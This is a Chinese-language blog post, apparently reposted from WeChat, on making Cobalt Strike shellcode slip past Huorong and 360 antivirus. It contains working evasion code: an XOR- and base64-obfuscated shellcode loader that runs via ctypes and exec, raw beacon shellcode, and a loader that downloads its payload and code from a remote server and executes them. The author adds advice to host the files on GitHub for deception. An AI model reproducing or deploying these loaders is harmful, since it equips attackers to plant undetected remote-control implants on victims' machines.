|
|
初识shellcode及简单免杀
0xNvyao,公众号:安全随笔初始shellcode及简单免杀
上一篇简单认识了shellcode以及进行非常简单的免杀,可以做到绕过某绒杀毒,但是过不了360杀,某绒应该是没有做深入的行为分析的,而360基于行为和云查杀,360最终是可以查杀出来,但并不是立即查杀出来。本节继续研究如何免杀。文章比较浅显,大佬请划走...
为了方便测试木马的上线,换Cobalt Strike来测试。
0x01,基于cs的静态免杀木马
先说结论,换成cs的马儿并且用上次一样的静态免杀的套路,结论还是被360杀掉,免杀分别是:
shellcode部分
加载器部分
加载器代码进行倒序后再进行base64编码
当然混淆方式可以自由变化!
基于cs的shellcode及加载器完整代码如下:
# -*- coding: utf-8 -*-import base64import ctypessource = '693-735-755-734-687-714-734-757-739-731-731-731-731-735-732-712-715-716-728-713-719-716-704-723-727-766-720-758-713-723-750-713-707-735-755-726-719-754-754-723-755-683-723-765-713-723-750-739-719-735-765-714-750-682-746-721-718-718-722-720-713-734-722-731-744-734-738-754-764-731-723-745-723-735-722-728-739-715-683-728-731-761-722-755-685-716-720-728-719-719-755-726-719-755-729-726-715-752-738-723-731-766-728-759-765-706-765-707-729-749-720-683-761-757-751-731-755-731-731-731-731-735-755-732-749-722-712-756-713-731-722-715-719-723-750-723-733-735-713-726-715-729-728-720-731-766-734-752-716-753-752-693-739-719-733-726-724-723-754-723-731-766-704-724-727-761-758-723-727-761-729-745-715-761-722-720-734-719-735-728-749-718-752-765-766-764-732-727-731-682-749-753-729-735-719-687-682-706-706-707-717-735-713-726-715-729-712-720-731-766-728-759-715-707-745-727-713-735-713-726-715-728-738-720-731-766-728-728-755-749-713-723-713-731-722-715-715-716-754-728-717-732-687-704-717-753-732-707-715-716-758-728-717-753-755-734-685-729-728-728-719-748-693-765-717-735-732-704-717-753-755-726-735-751-758-714-693-693-693-693-706-717-757-731-713-760-687-681-763-717-687-746-760-759-716-682-731-735-732-717-713-707-756-759-718-723-756-738-715-760-746-727-766-739-707-722-693-675-716-723-727-761-758-723-727-766-720-724-727-761-728-724-727-761-758-728-719-735-732-715-715-760-757-684-716-756-759-756-693-675-706-744-761-683-746-723-755-761-732-728-751-720-765-764-731-731-728-724-727-761-758-728-719-719-732-712-763-765-724-728-719-719-733-684-716-686-759-764-738-748-693-716-684-683-758-760-713-723-756-728-713-734-722-713-713-707-756-707-718-718-722-720-719-759-765-731-731-753-729-735-719-758-720-728-751-751-750-716-726-752-748-693-683-719-755-720-738-753-755-734-749-683-728-747-729-758-675-723-755-764-732-723-755-766-746-720-738-674-734-693-693-693-693-693-718-718-722-720-719-758-720-728-751-755-682-733-733-722-748-693-683-707-706-731-734-686-717-766-731-715-731-731-713-714-693-714-734-686-713-727-731-715-731-731-684-675-714-746-687-731-735-731-731-725-755-755-693-693-693-693-726-680-687-712-719-735-686-731-735-746-704-718-719-723-748-750-685-689-715-749-675-722-731-693-719-707-683-717-744-745-759-763-714-732-763-765-713-744-761-681-753-715-704-732-764-725-746-719-718-764-726-704-766-760-716-722-748-681-767-766-756-753-680-687-684-716-683-704-747-721-761-719-736-728-675-687-731-731-674-761-674-675-724-759-747-738-732-693-748-721-745-684-725-744-738-721-722-731-763-693-682-728-689-727-713-749-728-716-761-680-716-739-726-719-732-756-704-717-687-682-725-755-728-724-760-681-746-746-760-733-738-754-726-736-715-751-727-729-731-757-707-680-675-750-761-733-732-682-763-717-720-745-704-718-745-765-718-716-724-720-712-713-731-681-726-752-728-755-725-739-728-706-763-717-687-753-760-681-766-736-723-735-687-719-723-734-707-751-727-729-753-724-729-765-731-729-751-683-749-716-720-744-716-756-733-727-720-683-727-685-748-689-751-753-758-689-721-754-725-720-713-718-757-680-716-726-689-757-761-727-764-706-766-689-738-684-745-733-689-722-757-748-753-681-758-728-729-767-720-716-756-720-727-754-683-725-759-681-723-722-712-744-764-763-761-713-748-726-739-706-739-686-758-719-754-693-693-755-717-714-761-720-749-685-766-724-757-720-727-756-720-713-704-747-680-726-748-736-761-756-686-685-738-763-744-729-725-714-759-729-758-693-723-721-735-753-718-727-680-713-733-765-763-716-715-735-757-717-733-753-727-723-752-753-715-753-749-732-724-715-745-744-732-680-748-747-761-763-717-724-713-715-744-760-675-704-759-680-750-687-758-716-752-731-755-744-728-721-682-751-693-718-751-707-681-725-755-732-712-744-747-755-766-725-714-724-689-754-756-683-683-750-731-753-760-756-747-683-720-716-750-717-755-763-733-685-722-757-754-751-717-759-721-729-757-712-685-766-733-687-713-738-681-738-754-722-749-732-729-764-684-761-750-735-767-674-674-683-754-731-752-732-756-744-687-766-675-674-766-686-758-684-714-731-723-761-687-745-714-756-723-756-745-733-760-716-735-727-713-712-764-728-684-718-704-723-722-723-733-767-722-745-758-736-684-684-674-753-765-714-728-756-719-758-681-722-729-724-731-763-707-724-746-729-724-760-681-735-680-749-765-731-715-760-685-749-750-763-720-717-693-675-716-723-727-761-759-684-731-731-728-731-731-735-733-686-731-728-731-731-731-735-733-687-715-731-731-731-731-735-733-684-717-721-712-718-687-764-693-716-713-720-724-718-719-682-755-720-687-682-755-720-674-719-755-720-680-753-733-686-731-729-731-731-731-735-759-720-689-719-733-684-735-746-763-720-686-748-693-716-713-723-714-735-723-723-706-731-766-726-704-759-755-749-766-723-731-761-725-732-749-722-706-706-717-732-754-707-713-731-719-731-731-731-731-731-719-727-714-757-756-693-681-693-693-736-735-687-727-755-686-738-724-752-765-751-727-752-723-749-726-752-723-736-727-731-731-684-681-759-755-738'b64 = ''# shellcode payload解密list = source.split('-')for n in list:temp = int(n) ^ 666b64 += chr(temp)buf = base64.b64decode(b64)# 加载器解密b64 = b'KTEtICxlbGRuYWgodGNlamJPZWxnbmlTcm9GdGlhVy4yM2xlbnJlay5sbGRuaXcuc2VweXRjOykwICwwICwwICwwICwpZWdhcHh3cig0NnRuaXVfYy5zZXB5dGMgLDAgLDAoZGFlcmhUZXRhZXJDLjIzbGVucmVrLmxsZG5pdy5zZXB5dGMgPSBlbGRuYWg7KSlmdWIobmVsICwpZnViKHJlZmZ1Yl9nbmlydHNfZXRhZXJjLnNlcHl0YyAsKWVnYXB4d3IoNDZ0bml1X2Muc2VweXRjKHlyb21lTWV2b01sdFIuMjNsZW5yZWsubGxkbml3LnNlcHl0YzspMDR4MCAsMDAwM3gwICwpZnViKG5lbCAsMChjb2xsQWxhdXRyaVYuMjNsZW5yZWsubGxkbml3LnNlcHl0YyA9IGVnYXB4d3I7NDZ0bml1X2Muc2VweXRjPWVweXRzZXIuY29sbEFsYXV0cmlWLjIzbGVucmVrLmxsZG5pdy5zZXB5dGM='code = base64.b64decode(b64)[::-1]exec(code)
Pyinstaller打包查杀
# 打包命令pyinstaller -F -w csshellcode_enc.py
打包出来立即被360查杀:
0x02,网络分离免杀尝试
网络分离免杀,顾名思义是将恶意代码或攻击载荷分成多个部分,并以不同的方式进行传输和执行,从而避免被安全系统检测到。具体网络分离免杀又可细分为不同的类型,这里不深入介绍,不是本篇的重点。
免杀思路
将上面的shellcode马儿中的shellcode载荷部分和加载器部分分离,且分别通过网络传输下载执行。
生成shellcode二进制文件
1)先通过cs生成python语言的shellcode
2)将生成的shellcode写到payload.bin二进制文件中
buf = b"xfcx48x83xe4xf0xe8xc8x00x00x00x41x51x41x50x52x51x56x48x31xd2x65x48x8bx52x60x48x8bx52x18x48x8bx52x20x48x8bx72x50x48x0fxb7x4ax4ax4dx31xc9x48x31xc0xacx3cx61x7cx02x2cx20x41xc1xc9x0dx41x01xc1xe2xedx52x41x51x48x8bx52x20x8bx42x3cx48x01xd0x66x81x78x18x0bx02x75x72x8bx80x88x00x00x00x48x85xc0x74x67x48x01xd0x50x8bx48x18x44x8bx40x20x49x01xd0xe3x56x48xffxc9x41x8bx34x88x48x01xd6x4dx31xc9x48x31xc0xacx41xc1xc9x0dx41x01xc1x38xe0x75xf1x4cx03x4cx24x08x45x39xd1x75xd8x58x44x8bx40x24x49x01xd0x66x41x8bx0cx48x44x8bx40x1cx49x01xd0x41x8bx04x88x48x01xd0x41x58x41x58x5ex59x5ax41x58x41x59x41x5ax48x83xecx20x41x52xffxe0x58x41x59x5ax48x8bx12xe9x4fxffxffxffx5dx6ax00x49xbex77x69x6ex69x6ex65x74x00x41x56x49x89xe6x4cx89xf1x41xbax4cx77x26x07xffxd5x48x31xc9x48x31xd2x4dx31xc0x4dx31xc9x41x50x41x50x41xbax3ax56x79xa7xffxd5xebx73x5ax48x89xc1x41xb8x98x1fx00x00x4dx31xc9x41x51x41x51x6ax03x41x51x41xbax57x89x9fxc6xffxd5xebx59x5bx48x89xc1x48x31xd2x49x89xd8x4dx31xc9x52x68x00x02x40x84x52x52x41xbaxebx55x2ex3bxffxd5x48x89xc6x48x83xc3x50x6ax0ax5fx48x89xf1x48x89xdax49xc7xc0xffxffxffxffx4dx31xc9x52x52x41xbax2dx06x18x7bxffxd5x85xc0x0fx85x9dx01x00x00x48xffxcfx0fx84x8cx01x00x00xebxd3xe9xe4x01x00x00xe8xa2xffxffxffx2fx6ex51x50x4ex00x12x96x53x50x8bxedxefxe4x30xf4x70x3fx51x8dx56xaexc9x9ax3cx56xa0x4axb7x37x91x06x45x7cxeax54x4dxf2xd9x75xb5x47xbfx77x9dx9ex4dxb9xe9x5dx59xa8xa7x14xccx1fx79x00x0fx1cxf3xd3x66xabx11x7fxbcxabx3ax3axbcx4ax1cx06xbfxd0x1fx8cx4bx00x55x73x65x72x2dx41x67x65x6ex74x3ax20x4dx6fx7ax69x6cx6cx61x2fx34x2ex30x20x28x63x6fx6dx70x61x74x69x62x6cx65x3bx20x4dx53x49x45x20x37x2ex30x62x3bx20x57x69x6ex64x6fx77x73x20x4ex54x20x36x2ex30x29x0dx0ax00x02xbbx5cx15x26xb5x67x18xc2x75x33xbbxfexbax49x7ex2ax13x89x49x3ax36x54xbfxa8x70xc7xd7x77xecx7axb0x6fx87xa2xf9x37x94x10x9ex25x59xc9x32x1dx4ex9bx72x07x46xb7xdax71x2bxcbxc9x7cxb8x95x48x7fxfex25x8fx70x9cx3bx74xdax09x32x72x52x66xadx8bxbfx37x27xe3xbcx5axacx23x8fx98x29x7fx20xa1x24x4cxcdx92x1ax06x95x40x4ax16x1ax43x08x8ex44x24xc0x53x50xb2xb1x76xbexa7x1ax58xd4x90xadxbfx59x9bx6bx79x95x58xc0x8axb0x4axd2xefxd3xb9x8dxcex88x54x6bxaax27x4ex3cxdfxa1x9fx5dx6dx02x46xe7xabx52x55xb5x68x9ax1bxb1xe8x86xe5xa6x28x2ax11xedxd1xb9x4bx1dxf1x84x7cx05x09xfex9cxb4x47xbcxf3x58x40x8cx59xebxe5xdfx7cx77x89x7ax3cx02x1cxe6xc3xe7x22x7bx06x6dx51x0cx49x17xc1xe9x36x48x1cx81x9ex1exc9x73xebxafx24x80xf0x67x52x5dxc7x08xd0x1ax60xdax42x35xbdxc4xdbx08x00x41xbexf0xb5xa2x56xffxd5x48x31xc9xbax00x00x40x00x41xb8x00x10x00x00x41xb9x40x00x00x00x41xbax58xa4x53xe5xffxd5x48x93x53x53x48x89xe7x48x89xf1x48x89xdax41xb8x00x20x00x00x49x89xf9x41xbax12x96x89xe2xffxd5x48x83xc4x20x85xc0x74xb6x66x8bx07x48x01xc3x85xc0x75xd7x58x58x58x48x05x00x00x00x00x50xc3xe8x9fxfdxffxffx31x39x32x2ex31x36x38x2ex32x32x30x2ex32x33x30x00x3axdex68xb1"with open('./payload.bin', mode='wb') as file:file.write(buf)
将加载器代码及shellcode上传到远端
最终完整代码打包并检测查杀
# -*- coding: utf-8 -*-import base64import ctypesimport requestsresp = requests.get("http://192.168.220.230:8080/payload.bin")buf = resp.contentresp = requests.get("http://192.168.220.230:8080/codeloader.txt")code = resp.textexec(code)
上面的url可以换成公网地址,甚至可以换成github等知名的平台地址,这样更具有迷惑性。
Pyinstaller打包:
360静态扫描未查杀
运行检测未查杀
cs端可以正常管理马儿
好像这就绕过去了?也没有使用高级技巧吧
为了防止360云查杀存在延迟,特意观察两天,360杀毒依然是免杀的状态。
原文始发于微信公众号(安全随笔):初识shellcode及简单免杀2
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论